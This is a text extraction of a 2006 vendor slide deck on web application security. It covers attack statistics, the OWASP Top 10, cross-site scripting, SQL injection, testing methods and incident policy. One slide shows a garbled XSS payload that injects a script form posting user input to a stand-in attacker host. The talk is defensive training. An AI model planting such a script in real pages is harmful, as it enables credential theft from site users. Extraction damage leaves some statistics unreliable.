Hard Problems in Automated Penetration Testing

1
Cover Your Applications Top 5 Things You Can Do
Nov 8, 2006
Ambarish Malpani CTO/VP Eng Cenzic, Inc.
2
Proactive Security
Whoever is first in the field and awaits the
coming of the enemy, will be fresh for the fight
whoever is second in the field and has to hasten
to battle will arrive exhausted.
-- Sun-Tzu The Art of War
3
Agenda

• Why is Security Testing Important?
• What we will not cover
• Stats on Recent Issues
• Top 5 things you should do
• Summary

4
Why is Security Testing Important?
A few lines of code can wreak more havoc than a
bomb.
- Tom Ridge(Former) Secretary of the U.S.
Department of Homeland Security
5
Web Application Security Overview Recent
Statistics (ITSC Volume IX)

• Directory Traversal is the 2nd most common attack
  on the internet as of the 2nd half of 2005
• Cross-Site Scripting came in 7th place, of all
  attacks detected by Symantec.
• Symantec predicts an increasing trend away from
  hacking for fame toward hacking for fortune
• --Phishing up 9 in second half of 2005
• --Financial Services companies were the
  most frequently attacked in the 2nd half of
  2005
• Attack patterns suggest a shift away from OS
  targets to web applications and web server
  technologies.

6
Vulnerability Percentages
7
Web Application Security Overview Recent
Statistics (ITSC Volume X)

• 69 of all reported vulnerabilities were in web
  applications
• 78 of the reported web application
  vulnerabilities were easily exploitable.
• Web applications are required to accept and
  interpret input from many different sources, and
  there are very few restrictions to distinguish
  valid from invalid input. This is further
  complicated because Web browsers, the application
  through which most Web Applications operate, are
  very liberal in what they will accept and
  interpret as valid input
• ITSC vol. X (pg. 10)
• Often not subject to the same strenuous QA and
  security testing as other production quality
  code.

8
Why is App Security Important?
"75 of cyber attacks and Internet security
violations are generated through Internet
Applications" - Gartner Group
9
What are we protecting?

• Customer information
• Most of the customer information like name, SS,
  address, etc. is behind the web applications
• Employee information
• Protecting employee information is critical and
  hackers can get to it easily
• Credit Card information
• Hackers can get to your credit card information
  by coming through applications
• Patient information
• Most of the patient information can be accessed
  by hacking through the web applications.

10
What we will not cover

• In this talk, we will not cover network level
  protection of your network
• Firewalls, IDSs are well understood and
  reasonably widely deployed
• Neither will we cover patch management systems

11
Item 1 Educate Developers

• Developers need to be trained in security
• Security needs to be designed in
• Fixing problems causes patchwork, more problems
• Developer pushback on security issues is much
  less
• Security testing cant guarantee that it finds
  all problems
• Problems found during the security testing
  process are way more painful to deal with
• Any fixes delay a release

12
OWASP Top 10
Unvalidated Input
Information from web requests is not validated
before being used by a web application .
Broken Access Control
Restrictions on what authenticated users are
allowed to do are not properly enforced.
Broken Account and Session Mgmt
Account credentials and session tokens are not
properly protected.
Cross-site Scripting (XSS) Flaws
The web application can be used as a mechanism to
transport an attack to an end users browser.
Buffer Overflows
Web application components in some languages that
do not properly validate input can be crashed
and, in some cases, used to take control of a
process
Injection Flaws
Web applications pass parameters when they access
external systems or the local operation system.
Error conditions that occur during normal
operation are not handled properly and could
result in giving detailed system information to a
hacker, or crash the server
Improper Error Handling
Insecure storage
Web applications frequently use cryptographic
functions to protect information and credentials.
If not coded properly, it can result in weak
protection
Attackers can consume web application resources
to a point where legitimate users can no longer
access or use the application
Denial of service
Strong server configuration standard is critical
to a secure web application. Servers are not
secure out of the box and need to be configured
for security
Insecure configuration management
Source OWASP, 2004 www.owasp.org
13
Cross-Site Scripting

• What is it? The Web Application is used to
  store, transport, and deliver malicious active
  content to an unsuspecting user.
• Root Cause Failure to proactively reject or
  scrub malicious characters from input vectors.
• Impact Persistent XSS is stored and executed at
  a later time, by a user. Allows cookie theft,
  credential theft, data confidentiality,
  integrity, and availability risks. Browser
  Hijacking and Unauthorized Access to Web
  Application is possible using existing exploits.
• Solution A global as well as Form and Field
  specific policy for handling untrusted content.
  Use white lists and regular expressions to ensure
  input data conforms to the required character
  set, size, and syntax.

14
Unvalidated Input (A1) with XSS (A4)
15
Unvalidated Input (A1) with XSS (A4)
16
Unvalidated Input (A1) with XSS (A4)
17
Unvalidated Input (A1) with XSS (A4)
Unvalidated Input and resulted in a Cross-Site
Scripting Attack and the theft of the
Administrators Cookie
18
Cross-Site Scripting Content Spoofing

• Insert un-trusted content into the web
  application that can be used to trick users.
• Compromise of the integrity of application code
  via malicious script code injected into the
  database
• Limited only by the attackers imagination.

19
Cross-Site Scripting Exploit

• ltSCRIPTgtvar oWH window.open("","","width275,
  height175, top200, left250 locationno,
  menubarno, statusno, toolbarno, scrollbarsno,
  resizableno")oWH.document.write(
• HTML FORM with POST request to http//compromised-
  server/h4xor.php
• )lt/SCRIPTgt

20
Cross-Site Scripting Content Spoofing
21
SQL Injection

• What is it? Database contents are compromised or
  disclosed by the use of specially crafted input
  that manipulates SQL Query Logic.
• Root Cause Failure to properly scrub, reject, or
  escape domain-specific SQL characters from an
  input vector.
• Impact Data confidentiality, integrity, and
  availability with the ability to read, modify,
  delete, or even drop database tables.
• Solution Define accepted character-sets for
  input vectors, and enforce these white lists
  rigorously. Force input to conform to specific
  patterns when other special characters are
  needed dd-mm-yyyy. Also, use SQL Prepared
  Statements.

22
Types of SQL Injection Attacks

• Tautologies
• Blind SQL Injection

23
Example SQL Tautology Injection

• Submitting SQL Query logic instead of a
  valid date can expose confidential records.

.
24
Example SQL Tautology Injection

• Submitting SQL Query logic instead of a
  valid date can expose confidential records.

.
25
Item 2 Test Your Applications

• Test your Application
• Hopefully testing is just verifying that your
  developers did a great job!
• More options than in the past
• Manual penetration testing
• Source code analysis
• Automated penetration testing

26
Manual Penetration Testing

• Hire experienced companies/professionals to
  attack your web application
• Comments
• Cost
• Time (to get people, cover apps)
• Need to redo with new versions, bug fixes
• Thoroughness
• Variability based on the individual
• If you get the right people, can be very effective

27
Source Code Scanning

• Look at the web application source code
• Identify cases where user input can reach
  sensitive functions
• Comments
• Need developer and management commitment
• Need process changes
• Lots of false positives
• Language dependent
• Hard to cover cases when source unavailable
• Scaling issues
• Miss issues across modules

28
Automated Penetration Testing

• Do automated security testing of apps (ideally
  before deployment)
• Comments
• Fits in very nicely with functionality testing
• Doesnt require process changes
• Doesnt need to be expensive
• Cant test for everything manual testers can

29
Item 3Test Your Application Again

• Continuous testing of applications is extremely
  important
• New vulnerabilities being discovered all the time
• New methods of attacks are being proposed (both
  by the black and white hats)
• With new security test automation tools this
  isnt as prohibitive as before
• Automation allows tests to be done automatically
• Time for a retest can be much lower
• With tools, there isnt a huge consultant cost
  for a retest

30
Demo I
31
Demo II
32
Demo III
33
Item 4 Monitor Your Site

• Monitoring your site is important because
• It lets you know how effective your developer
  education/testing was
• Alerts you to new attack string and mechanisms
• Allows you to know if there has been a breach and
  respond to it

34
Item 5 Have a Vulnerability Policy

• Policy When a Break-in Happens or a Vulnerability
  is Found
• Need to have Backup and Restore Processes in
  place
• Need to have Practice runs of the Response
  Process
• Application Firewalls can help while you get a
  fix for vulnerabilities found in deployed
  applications
• Avg time Exploit -gt Vulnerability 6.8 days
• Avg time Exploit -gt Patch 49 days
• The hackers have a faster release process!
• Source Symantecs Internet Security Threat
  Report IX
• Need a Hot fix process

35
Summary

• We talked about the need for security testing
• We covered the Top 5 Things-To-Do
• Educate Developers
• Test your applications
• Test them again
• Monitor your applications
• Have a vulnerability policy

36
Questions/Discussion

• Ambarish Malpani
• 408.200.0716
• request_at_cenzic.com